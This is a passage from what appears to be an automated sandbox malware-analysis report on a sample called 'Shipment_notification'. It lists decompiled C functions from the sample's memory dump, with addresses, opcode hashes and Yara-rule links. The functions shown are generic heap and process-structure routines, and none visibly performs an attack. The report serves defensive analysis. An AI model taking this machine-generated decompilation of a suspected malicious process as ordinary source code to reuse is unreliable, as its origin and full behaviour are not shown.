				} else {
					return E01B00050(_t14);
				}
			}










                                                                                0x01afff66
                                                                                0x01afff6b
                                                                                0x00000000
                                                                                0x01afff8f
                                                                                0x00000000
                                                                                0x01afff8f

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9b6783580ee2e91ce1b3e6b93d2530a89172c16698c68a1de64c576ecb0c5208
                                                                                • Instruction ID: f187472fc7d20de2e68c8c5ca5d1860bc75322c70a6e500f663b769efd9a6cc4
                                                                                • Opcode Fuzzy Hash: 9b6783580ee2e91ce1b3e6b93d2530a89172c16698c68a1de64c576ecb0c5208
                                                                                • Instruction Fuzzy Hash: 3AE026B2205304DFDB3ADFDAD880F253BAC9F52721F19845DF20A4B502C721D880C386
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B741E8 Relevance: .0, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E01B741E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x1bc08f0);
				_t5 = E01B3D08C(__ebx, __edi, __esi);
				if( *0x1bd87ec == 0) {
					E01AFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x1bd87ec == 0) {
						 *0x1bd87f0 = 0x1bd87ec;
						 *0x1bd87ec = 0x1bd87ec;
						 *0x1bd87e8 = 0x1bd87e4;
						 *0x1bd87e4 = 0x1bd87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01B74248();
				}
				return E01B3D0D1(_t5);
			}





                                                                                0x01b741e8
                                                                                0x01b741ea
                                                                                0x01b741ef
                                                                                0x01b741fb
                                                                                0x01b74206
                                                                                0x01b7420b
                                                                                0x01b74216
                                                                                0x01b7421d
                                                                                0x01b74222
                                                                                0x01b7422c
                                                                                0x01b74231
                                                                                0x01b74231
                                                                                0x01b74236
                                                                                0x01b7423d
                                                                                0x01b7423d
                                                                                0x01b74247

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c71c71c398b8031ff8eab0de78925d9990d7b3252687dfff7635bce0edc29067
                                                                                • Instruction ID: c763a0c1cbb9c762ba8f2d87e388dae996647943ef532a4484de150736c5a2d0
                                                                                • Opcode Fuzzy Hash: c71c71c398b8031ff8eab0de78925d9990d7b3252687dfff7635bce0edc29067
                                                                                • Instruction Fuzzy Hash: AEF03979922702EFCBBEEFA9D52070476B4F794713F42419AD11087298E73444A4CF02
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B9D380 Relevance: .0, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B9D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L01AEE8B0(__ecx, _a4, 0xfff);
					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                0x01b9d38a
                                                                                0x01b9d39b
                                                                                0x01b9d3b1
                                                                                0x00000000
                                                                                0x01b9d3b6
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                • Instruction ID: a25adddb7dce48d966af305a23cc46c82e99f926e72fe9bcdfd9cbc0a8041eae
                                                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                • Instruction Fuzzy Hash: BAE0C231284205FBDF275E84CC00F79BB56DB507A1F104071FE085A691CB75AC92D6C4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B1A185 Relevance: .0, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B1A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x1bd67e4 >= 0xa) {
					if(_t5 < 0x1bd6800 || _t5 >= 0x1bd6900) {
						return L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01B00010(0x1bd67e0, _t5);
				}
			}





                                                                                0x01b1a190
                                                                                0x01b1a1a6
                                                                                0x01b1a1c2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1a192
                                                                                0x01b1a192
                                                                                0x01b1a19f
                                                                                0x01b1a19f

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8ad827453200e54abecb09c9b1ebe3ee58db58b16faecf291ca724bbb7c8d6db
                                                                                • Instruction ID: 56cef9eabdee7b9805d0e268105252708969f34ef4bd7bc16ff0bf0ade052b43
                                                                                • Opcode Fuzzy Hash: 8ad827453200e54abecb09c9b1ebe3ee58db58b16faecf291ca724bbb7c8d6db
                                                                                • Instruction Fuzzy Hash: 3BD02B6212208416CB2E6321CC54B213712F7847A0F3604DDF2030B5E9FF61A8E08109
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B116E0 Relevance: .0, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B116E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01B11710(0x1bd67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01B04620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                0x01b116e8
                                                                                0x01b116ef
                                                                                0x01b116f3
                                                                                0x01b116fe
                                                                                0x00000000
                                                                                0x01b11700
                                                                                0x01b1170d
                                                                                0x01b1170d
                                                                                0x01b116f2
                                                                                0x01b116f2
                                                                                0x01b116f2
                                                                                0x01b116f2

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1347ca459677eafb8e647e671673cf01e9a57b7e123ce8cb08d5d03b039bd45d
                                                                                • Instruction ID: de7a57fc75bfcd9f9c5d636e5714ea4cf9138c6bcc00e4b3234c03f1f27ab318
                                                                                • Opcode Fuzzy Hash: 1347ca459677eafb8e647e671673cf01e9a57b7e123ce8cb08d5d03b039bd45d
                                                                                • Instruction Fuzzy Hash: E4D0A771200102D2EE2E5B2CDC14B142651EB90781F7904DCF307494C1DFB1CC92E048
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B653CA Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B653CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E01AFEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                                0x01b653ca
                                                                                0x01b653ce
                                                                                0x01b653d9
                                                                                0x01b653de
                                                                                0x01b653e1
                                                                                0x01b653e1
                                                                                0x01b653e6
                                                                                0x01b653f3
                                                                                0x00000000
                                                                                0x01b653f8
                                                                                0x01b653fb

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                • Instruction ID: 91ff4295e83496352564d2088bd409bd1548a5dbfbdfe0b1e7516b31ea11e1f6
                                                                                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                • Instruction Fuzzy Hash: 98E08C31A006849BCF26DB88CA90F4EBBF9FB54B80F150088A1095F661C728AC00CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B135A1 Relevance: .0, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B135A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E01AFEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                0x01b135a1
                                                                                0x01b135a1
                                                                                0x01b135a5
                                                                                0x01b135ab
                                                                                0x01b135ab
                                                                                0x01b135b5
                                                                                0x00000000
                                                                                0x01b135c1
                                                                                0x01b135b7

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                • Instruction ID: 524511a7506927426562d5c08597672e6b97fddcc33adaf2203a82c3a41c2708
                                                                                • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                • Instruction Fuzzy Hash: E2D0A9315011859EEB0AAB54C2187683BF3FB00A28FDA20E9D1020687EE33E4A0AC600
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AFAAB0 Relevance: .0, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01AFAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                0x01afaab6
                                                                                0x01afaabb
                                                                                0x01b4a442
                                                                                0x00000000
                                                                                0x01b4a448
                                                                                0x01b4a454
                                                                                0x01b4a454
                                                                                0x01afaac1
                                                                                0x01afaac1
                                                                                0x01afaac6
                                                                                0x01afaac6

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                • Instruction ID: 432e17550106ded83d399661c42eace513bc08e2d404bbd487157f75a8fafe8d
                                                                                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                • Instruction Fuzzy Hash: 83D0C935352980CFD71BDB1CC554B0533A4FB04B40FC504D0E501CB762E72CD944CA00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B6A537 Relevance: .0, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B6A537(intOrPtr _a4, intOrPtr _a8) {

				return L01B08E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                0x01b6a553

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                • Instruction ID: 7b86b8566b831e2caee17cec6bc72c644cd520d0a2ca13a0076f156938edd174
                                                                                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                • Instruction Fuzzy Hash: A1C01232080648BBCF136E81CC00F067F2AEBA4B60F008010BA080A5B0C632EAB0EA84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AEDB40 Relevance: .0, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01AEDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01B04620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                0x01aedb4d
                                                                                0x01aedb54
                                                                                0x01aedb5f
                                                                                0x01aedb56
                                                                                0x01aedb56
                                                                                0x01aedb5c
                                                                                0x01aedb5c

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                • Instruction ID: f70bba88477301544964fcb6be4ee0553f1521dbad77378a17a0ca41d45b8d38
                                                                                • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                • Instruction Fuzzy Hash: 3DC08C30290A01AAEF262F20CE01B003AA1BB10B01F4404E0B300DA0F0EB78D801E600
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AEAD30 Relevance: .0, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01AEAD30(intOrPtr _a4) {

				return L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                0x01aead49

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                • Instruction ID: 3f7219cf5a466d19dca36eb78254aa27439238f9f879f0d2e46f20a6e3f1c104
                                                                                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                • Instruction Fuzzy Hash: 76C08C32080248BBCB126A45CD00F01BF29E7A0BA0F000020B6040A6A2CA32E860D588
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AF76E2 Relevance: .0, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01AF76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                                0x01af76e4
                                                                                0x00000000
                                                                                0x01af76f8
                                                                                0x01af76fd

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                • Instruction ID: 858fd73950c63b9fd64a778c4eb52da071b17d6af102eebed99b8cbed617a7ab
                                                                                • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                • Instruction Fuzzy Hash: 22C08C701411805AEF2B578CCE20B203A50AB08608F4805ACBB41094E2D368B802C288
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B03A1C Relevance: .0, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B03A1C(intOrPtr _a4) {
				void* _t5;

				return L01B04620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                0x01b03a35

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                • Instruction ID: a9b940221d747ddbb7d42b8a0eced51a74cf1ec1569ffbff87931c3a8ea9f53a
                                                                                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                • Instruction Fuzzy Hash: 89C08C32080648BBCB126E41DD00F017F29E7A0B60F000060B7040A5A0C632EC60D588
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B07D50 Relevance: .0, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B07D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                0x01b07d56
                                                                                0x01b07d5b
                                                                                0x01b07d60
                                                                                0x01b07d5d
                                                                                0x01b07d5d
                                                                                0x01b07d5d

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                • Instruction ID: 9def23eff05eda83c983ed3cebce93838b9bb792c535cec02f84b661ef0b2d3f
                                                                                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                • Instruction Fuzzy Hash: E3B092353019408FCE1BDF18C080B1573E4FB44A40B8400D0E400CBA21D729E9008900
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B12ACB Relevance: .0, Instructions: 5COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E01B12ACB() {
				void* _t5;

				return E01AFEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                                0x01b12adc

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                • Instruction ID: 141debeffdda320b8ce8ac77c401ac36fa228855db8cd7b246e3b4179b190688
                                                                                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                • Instruction Fuzzy Hash: BBB01232D10445CFCF02EF80C710B197332FB00790F068494A10167930C228AC01CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B295F0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0007d0abc8597d9bc792e6e320429b68bb0ebf8ef8ab53e02735f7402f492b4c
                                                                                • Instruction ID: b48d8472449390c4dc54b1a948bd23c976c267426ae1c3f6a7973e316d1ec318
                                                                                • Opcode Fuzzy Hash: 0007d0abc8597d9bc792e6e320429b68bb0ebf8ef8ab53e02735f7402f492b4c
                                                                                • Instruction Fuzzy Hash: B190027221100802D108619D48046861005A7D0342FD1C055A6014655ED7A588B17171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B299D0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 90951041c0a50d0af4b000443a744daa81eaab2bafbd3337996ffd8d211a0506
                                                                                • Instruction ID: 7afe9cb51330636ff81baa31bc1d0d54220bf9049fab53d2a8bf134826f878c8
                                                                                • Opcode Fuzzy Hash: 90951041c0a50d0af4b000443a744daa81eaab2bafbd3337996ffd8d211a0506
                                                                                • Instruction Fuzzy Hash: 9C9002A222100042D108619D44047061045A7E1242FD1C056A2144554CC6698C716165
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B2AD30 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0e66468df3a5be6c203feb22bb95b20edf264a56e563af9dd36d1ba5d912ccee
                                                                                • Instruction ID: 5d723649681339df72253d10438dc0fcc62526dd34f591de8359b59ce6a8b22b
                                                                                • Opcode Fuzzy Hash: 0e66468df3a5be6c203feb22bb95b20edf264a56e563af9dd36d1ba5d912ccee
                                                                                • Instruction Fuzzy Hash: 4F900272A15000129144719D48146465006B7E0782BD5C055A0504554CCA948A7563E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29520 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 49a88c72efe41aac81365f838daf3d51bf61bd3ca5c23998d606d6603a0b2865
                                                                                • Instruction ID: b792d4def51ee1d6ee282c57ebcdf9e9a6c4fee5aacb2c4dbb9cd410f1c2bed3
                                                                                • Opcode Fuzzy Hash: 49a88c72efe41aac81365f838daf3d51bf61bd3ca5c23998d606d6603a0b2865
                                                                                • Instruction Fuzzy Hash: AA9002E2211140924504A29D8404B0A5505A7E0242BD1C05AE1044560CC6658871A175
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29560 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 39406f06b606187a176a7477066401b1003e9213e1e37e3529a86d0c86aee944
                                                                                • Instruction ID: a7586bbd4084127b78e2b277e80d12ad2c1952c07b63e27038b7f9192685208c
                                                                                • Opcode Fuzzy Hash: 39406f06b606187a176a7477066401b1003e9213e1e37e3529a86d0c86aee944
                                                                                • Instruction Fuzzy Hash: DD900266231000020149A59D060450B1445B7D63923D1C059F1406590CC76188756361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29950 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 554166c7b2cdbf49fa14a68e776253de7b9914a29e6c45e8a80edecd1d5f5f86
                                                                                • Instruction ID: 80d0e794d1f958ec20e200d393bd4348e3bda32b5bd0c3126b9c8a901cb5e009
                                                                                • Opcode Fuzzy Hash: 554166c7b2cdbf49fa14a68e776253de7b9914a29e6c45e8a80edecd1d5f5f86
                                                                                • Instruction Fuzzy Hash: 709002A221140403D144659D48046071005A7D0343FD1C055A2054555ECB698C717175
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B298A0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ad3ee21f8abd753a73375b71f77289d125aaf50496782c152afee5401cbb0e2b
